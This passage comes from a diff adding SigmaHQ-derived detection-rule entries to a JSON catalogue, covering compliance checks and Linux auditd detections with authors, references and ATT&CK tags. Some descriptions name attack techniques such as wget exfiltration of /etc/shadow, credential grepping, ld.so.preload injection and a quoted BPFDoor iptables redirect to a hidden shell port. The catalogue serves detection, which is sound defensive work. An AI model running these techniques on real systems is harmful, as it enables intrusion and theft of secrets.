"https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/firewall_cleartext_protocols.yml" + ], + "tags": "No established tags" + }, + "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", + "value": "Cleartext Protocol Usage" + }, + { + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "group_modification_logging.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/group_modification_logging.yml" + ], + "tags": "No established tags" + }, + "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "value": "Group Modification Logging" + }, + { + "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/19", + "falsepositive": "No established falsepositives", + "filename": "host_without_firewall.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "qualys", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" + ], + "tags": "No established tags" + }, + "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", + "value": "Host Without Firewall" + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "netflow_cleartext_protocols.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" + ], + "tags": "No established tags" + }, + "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", + "value": "Cleartext Protocol Usage Via Netflow" + }, + { + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "workstation_was_locked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/workstation_was_locked.yml" + ], + "tags": "No established tags" + }, + "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "value": "Locked Workstation" + }, + { + "description": "Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", + "meta": { + "author": "Peter Matkovski", + "creation_date": "2019/05/12", + "falsepositive": [ + "Admin or User activity" + ], + "filename": "lnx_auditd_alter_bash_profile.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "MITRE Attack technique T1156; .bash_profile and .bashrc. ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" + ], + "tags": [ + "attack.s0003", + "attack.persistence", + "attack.t1546.004" + ] + }, + "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", + "value": "Edit of .bash_profile and .bashrc" + }, + { + "description": "Detects attempts to record audio with arecord utility", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/04", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_audio_capture.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://linux.die.net/man/1/arecord", + "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", + "https://attack.mitre.org/techniques/T1123/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", + "value": "Audio Capture" + }, + { + "description": "Detect changes in auditd configuration files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_auditing_config_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + "Self Experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", + "value": "Auditing Configuration Changes on Linux Host" + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate script work" + ], + "filename": "lnx_auditd_binary_padding.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", + "value": "Binary Padding - Linux" + }, + { + "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", + "meta": { + "author": "Rafal Piasecki", + "creation_date": "2022/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "lnx_auditd_bpfdoor_file_accessed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.t1059" + ] + }, + "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", + "value": "BPFDoor Abnormal Process ID or Lock File Accessed" + }, + { + "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", + "meta": { + "author": "Rafal Piasecki", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate ports redirect" + ], + "filename": "lnx_auditd_bpfdoor_port_redirect.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", + "value": "Bpfdoor TCP Ports Redirect" + }, + { + "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/28", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_capabilities_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://man7.org/linux/man-pages/man8/getcap.8.html", + "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", + "https://mn3m.info/posts/suid-vs-capabilities/", + "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" + ], + "tags": [ + "attack.collection", + "attack.privilege_escalation", + "attack.t1123", + "attack.t1548" + ] + }, + "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", + "value": "Linux Capabilities Discovery" + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_change_file_time_attr.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", + "value": "File Time Attribute Change - Linux" + }, + { + "description": "Detects removing immutable file attribute.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "filename": "lnx_auditd_chattr_immutable_removal.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", + "value": "Remove Immutable File Attribute - Auditd" + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/24", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "filename": "lnx_auditd_clipboard_collection.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1115/", + "https://linux.die.net/man/1/xclip", + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", + "value": "Clipboard Collection with Xclip Tool - Auditd" + }, + { + "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/10/01", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "filename": "lnx_auditd_clipboard_image_collection.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1115/", + "https://linux.die.net/man/1/xclip", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "f200dc3f-b219-425d-a17e-c38467364816", + "value": "Clipboard Collection of Image Data with Xclip Tool" + }, + { + "description": "Detects command line parameter very often used with coin miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/09", + "falsepositive": [ + "Other tools that use a --cpu-priority flag" + ], + "filename": "lnx_auditd_coinminer.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://xmrig.com/docs/miner/command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", + "value": "Possible Coin Miner CPU Priority Param" + }, + { + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "author": "Marie Euler", + "creation_date": "2020/05/18", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_create_account.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "MITRE Attack technique T1136; Create Account ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ] + }, + "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", + "value": "Creation Of An User Account" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ] + }, + "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", + "value": "CVE-2021-3156 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ] + }, + "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", + "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-4034.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/01/27", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_4034.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/berdav/CVE-2021-4034", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", + "https://access.redhat.com/security/cve/CVE-2021-4034", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", + "value": "CVE-2021-4034 Exploitation Attempt" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate use of archiving tools by legitimate user." + ], + "filename": "lnx_auditd_data_compressed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560.001" + ] + }, + "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "value": "Data Compressed" + }, + { + "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/18", + "falsepositive": [ + "Legitimate usage of wget utility to post a file" + ], + "filename": "lnx_auditd_data_exfil_wget.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/tactics/TA0010/", + "https://linux.die.net/man/1/wget", + "https://gtfobins.github.io/gtfobins/wget/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", + "value": "Data Exfiltration with Wget" + }, + { + "description": "Detects overwriting (effectively wiping/deleting) of a file.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Appending null bytes to files.", + "Legitimate overwrite of files." + ], + "filename": "lnx_auditd_dd_delete_file.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", + "value": "Overwriting the File with Dev Zero or Null" + }, + { + "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/01/22", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_disable_system_firewall.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://attack.mitre.org/techniques/T1562/004/", + "https://firewalld.org/documentation/man-pages/firewall-cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" + ], + "tags": [ + "attack.t1562.004", + "attack.defense_evasion" + ] + }, + "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", + "value": "Disable System Firewall" + }, + { + "description": "Detects file and folder permission changes.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "User interacting with files permissions (normal/daily behaviour)." + ], + "filename": "lnx_auditd_file_or_folder_permissions.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", + "value": "File or Folder Permissions Change" + }, + { + "description": "Detecting attempts to extract passwords with grep", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_find_cred_in_files.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", + "value": "Credentials In Files - Linux" + }, + { + "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/06", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_files_directories.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://attack.mitre.org/techniques/T1564/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", + "value": "Hidden Files and Directories" + }, + { + "description": "Detects appending of zip file to image", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_zip_files_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", + "value": "Steganography Hide Zip Information in Picture File" + }, + { + "description": "Detect attempt to enable auditing of TTY input", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/05/24", + "falsepositive": [ + "Administrative work" + ], + "filename": "lnx_auditd_keylogging_with_pam_d.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://attack.mitre.org/techniques/T1003/", + "https://linux.die.net/man/8/pam_tty_audit", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1056.001" + ] + }, + "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", + "value": "Linux Keylogging with Pam.d" + }, + { + "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_ld_so_preload_mod.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.006" + ] + }, + "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", + "value": "Modification of ld.so.preload" + }, + { + "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/02", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_load_module_insmod.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1547/006/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", + "https://linux.die.net/man/8/insmod", + "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.006" + ] + }, + "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", + "value": "Loading of Kernel Module via Insmod" + }, + { + "description": "Detect changes of syslog daemons configuration files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_logging_config_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "self experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", + "value": "Logging Configuration Changes on Linux Host" + }, + { + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": "No established falsepositives", + "filename": "lnx_auditd_masquerading_crond.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "value": "Masquerading as Linux Crond Process" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_network_service_scanning.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "3761e026-f259-44e6-8826-719ed8079408", + "value": "Linux Network Service Scanning - Auditd" + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user uses network sniffing tool for legitimate reasons." + ], + "filename": "lnx_auditd_network_sniffing.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 